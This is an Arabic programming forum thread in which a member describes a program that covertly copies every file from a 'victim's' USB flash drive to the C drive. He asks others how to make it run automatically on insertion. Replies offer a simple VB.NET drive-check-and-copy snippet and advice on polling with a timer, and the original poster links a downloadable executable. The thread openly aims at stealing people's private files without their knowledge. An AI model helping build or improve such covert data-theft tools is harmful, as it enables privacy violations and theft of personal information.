فكرة تحتاج للتطوير لبرنامج مراقبة منافذ ال usb

تم تحميل الصفحة في 1,9411467 ثانية
فكرة تحتاج للتطوير لبرنامج مراقبة منافذ ال usb
الحالة
مغلق و غير مفتوح للمزيد من الردود.

blackrose

Beginner Developer
rank
إنضم
25 أكتوبر 2009
المشاركات
132
الإعجابات
22
النقاط
0
فكرة تحتاج للتطوير لبرنامج مراقبة منافذ ال usb لنسخ الفلاش ميموري

السلام عليكم أحلى أعضاء الديف بوينت

اليوم عملت برنامج بسيط لنسخ جميع الملفات من الفلاش ميموري إلى القرص c
بشكل خفي , جائتني الفكرة أنه يوجد الكثير من الناس تضع معلوماتها المهمة على الفلاش ميموري ولكن لا يمكنك الوصول إليها في بعض الأحيان مثلا عندما لا يكون الضحية متصل بالانترنت .
فمزايا هذه الفكرة :
* البرنامج مفيد لنسخ الفلاش ميموري الخاص بالضحية
* معظم الناس تضع معلوماتها المهمة في الفلاش ميموري لكي لا يتم العبث بها .
* في بعض الأحيان يضع الضحية الفلاش ميموري ولكن لا يكون متصل بالانترنت فلا يمكنك الوصل إليها

فالمشكلة بالبرنامج الذي عملته أنه لا يعمل تلقائيا يجب الضغط على البرنامج ليبدأ بالنسخ
فأذا كان هناك أحد يعرف ما هي الخطوات لجعل البرنامج يعمل تلقائيا عند وضع الفلاش ميموري
لا يبخل علينا​
 

NaZy

Beginner Developer
rankrankrankrankrank
إنضم
15 سبتمبر 2010
المشاركات
2,468
الإعجابات
464
النقاط
0
رد: فكرة تحتاج للتطوير لبرنامج مراقبة منافذ ال usb

blackrose


مبدع ياقلبي + جاري تقيمك

وواتمني ! لو القي برنامج ينسخ فلاش اوتمتيك !

اخـوي عندي لك حـل
روح عند عبابنه ! تراه ملك برمجه واساله !

عبابنه دوره مشهور

بررب :16:
 
إنضم
15 أغسطس 2010
المشاركات
431
الإعجابات
20
النقاط
0
رد: فكرة تحتاج للتطوير لبرنامج مراقبة منافذ ال usb

اها الوضع حلو ياشباب وابشر بالي اقدر علية :28:
الان انت تبي اول مايشبك الفلاش ينسخه طيب انا عندي لك طريقة هي انك تصنع برنامج يقوم بالتحقق من شبك الفلاش فاذا انشبك ينسخ ملفاتة واقدم الكود ذا وهو بسييييط جدا اتطويرة او اخذ فكرة عنة
If My.Computer.FileSystem.DirectoryExists("f:/") Then 'طيعا هنا يتحقق اذا وجد قرص باسم f فانة يعمل مابعد ال then
My.Computer.FileSystem.CopyFile("C:/9.jpg", "C:/9.jpg") ' مثلا اذا وجد الصورة ينسخها على القرص سي
End If
الكود ب vb.net
 

blackrose

Beginner Developer
rank
إنضم
25 أكتوبر 2009
المشاركات
132
الإعجابات
22
النقاط
0
رد: فكرة تحتاج للتطوير لبرنامج مراقبة منافذ ال usb

شكرا للتفاعل ولكن خبرتي بالبرمجة بسيطة جدا يعني انا مبرمجه على ملف bat

اها الوضع حلو ياشباب وابشر بالي اقدر علية
الان انت تبي اول مايشبك الفلاش ينسخه طيب انا عندي لك طريقة هي انك تصنع برنامج يقوم بالتحقق من شبك الفلاش فاذا انشبك ينسخ ملفاتة واقدم الكود ذا وهو بسييييط جدا اتطويرة او اخذ فكرة عنة
شكرا أخي على الكود ولكن يجب أن تضع في الحسبان أنه تختلف تقسيمات الهارد من كمبيوتر لأخر يعني أنت وضعت استهداف القرص f فمن المحتمل أن تكون الفلاش ميموري على غير القرص f
 
إنضم
15 أغسطس 2010
المشاركات
431
الإعجابات
20
النقاط
0
رد: فكرة تحتاج للتطوير لبرنامج مراقبة منافذ ال usb

شكرا للتفاعل ولكن خبرتي بالبرمجة بسيطة جدا يعني انا مبرمجه على ملف bat


شكرا أخي على الكود ولكن يجب أن تضع في الحسبان أنه تختلف تقسيمات الهارد من كمبيوتر لأخر يعني أنت وضعت استهداف القرص f فمن المحتمل أن تكون الفلاش ميموري على غير القرص f
لا انا لاقصد استهداف القرص هذا فقد انا اقول كرر الكود ذا يعني c,d,f,g,h,j وكذا :6:
 

blackrose

Beginner Developer
rank
إنضم
25 أكتوبر 2009
المشاركات
132
الإعجابات
22
النقاط
0
رد: فكرة تحتاج للتطوير لبرنامج مراقبة منافذ ال usb

لا انا لاقصد استهداف القرص هذا فقد انا اقول كرر الكود ذا يعني c,d,f,g,h,j وكذا
اها صحيح فهمت عليك سأحاول تجربتها ولكن لا أظن انها ستعمل على ملف bat
على كل اذا ما ظبطت معي أتمنى من الاخ عبابنه الاهتمام بالموضوع لأنه أعتقد يحتاج مبرمج محترف
 
إنضم
15 أغسطس 2010
المشاركات
431
الإعجابات
20
النقاط
0
رد: فكرة تحتاج للتطوير لبرنامج مراقبة منافذ ال usb

لا مش محتاجة لا مبرمج محترف وولا شئ الكود اديتك اياه للغة الvb.net فقط :3:
 

spu_hak

Active DeveloPer
rankrank
إنضم
28 ديسمبر 2009
المشاركات
447
الإعجابات
63
النقاط
28
رد: فكرة تحتاج للتطوير لبرنامج مراقبة منافذ ال usb

اها الوضع حلو ياشباب وابشر بالي اقدر علية :28:
الان انت تبي اول مايشبك الفلاش ينسخه طيب انا عندي لك طريقة هي انك تصنع برنامج يقوم بالتحقق من شبك الفلاش فاذا انشبك ينسخ ملفاتة واقدم الكود ذا وهو بسييييط جدا اتطويرة او اخذ فكرة عنة

الكود ب vb.net

مشككوووور علي الكود

بس الكود حيشتغل عند تشغيل البرنامج مرة واحدة فقط واذا استخدمنا تايمر فذلك سيؤذي الي استهلاك الرام بشكل كبير
 
إنضم
15 أغسطس 2010
المشاركات
431
الإعجابات
20
النقاط
0
رد: فكرة تحتاج للتطوير لبرنامج مراقبة منافذ ال usb




مشككوووور علي الكود

بس الكود حيشتغل عند تشغيل البرنامج مرة واحدة فقط واذا استخدمنا تايمر فذلك سيؤذي الي استهلاك الرام بشكل كبير
اذا كان تايمر واحد و الانترفايل = 1000 والفورم مافية الا التيمر ذا ماراح يستهلك الرام باذن الله :)
 

blackrose

Beginner Developer
rank
إنضم
25 أكتوبر 2009
المشاركات
132
الإعجابات
22
النقاط
0
رد: فكرة تحتاج للتطوير لبرنامج مراقبة منافذ ال usb

على كل هذا الكود بأعتبار أن الفلاش ميموري F أو H أو I
ملف تنفيذي افتحه عن طريق الوينرار بداخله كود النسخ الذي ينسخ من الفلاش الى C:\2
أرجو من الاخوة أصحاب الخبرة تطويره أو على الاقل تطوير برنامج أخر بنفس الوظائف نظرا لأهمية برامج مثل هذا البرنامج

وهذا الرابط اذا في أحد يحب يكمله

تحميل
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل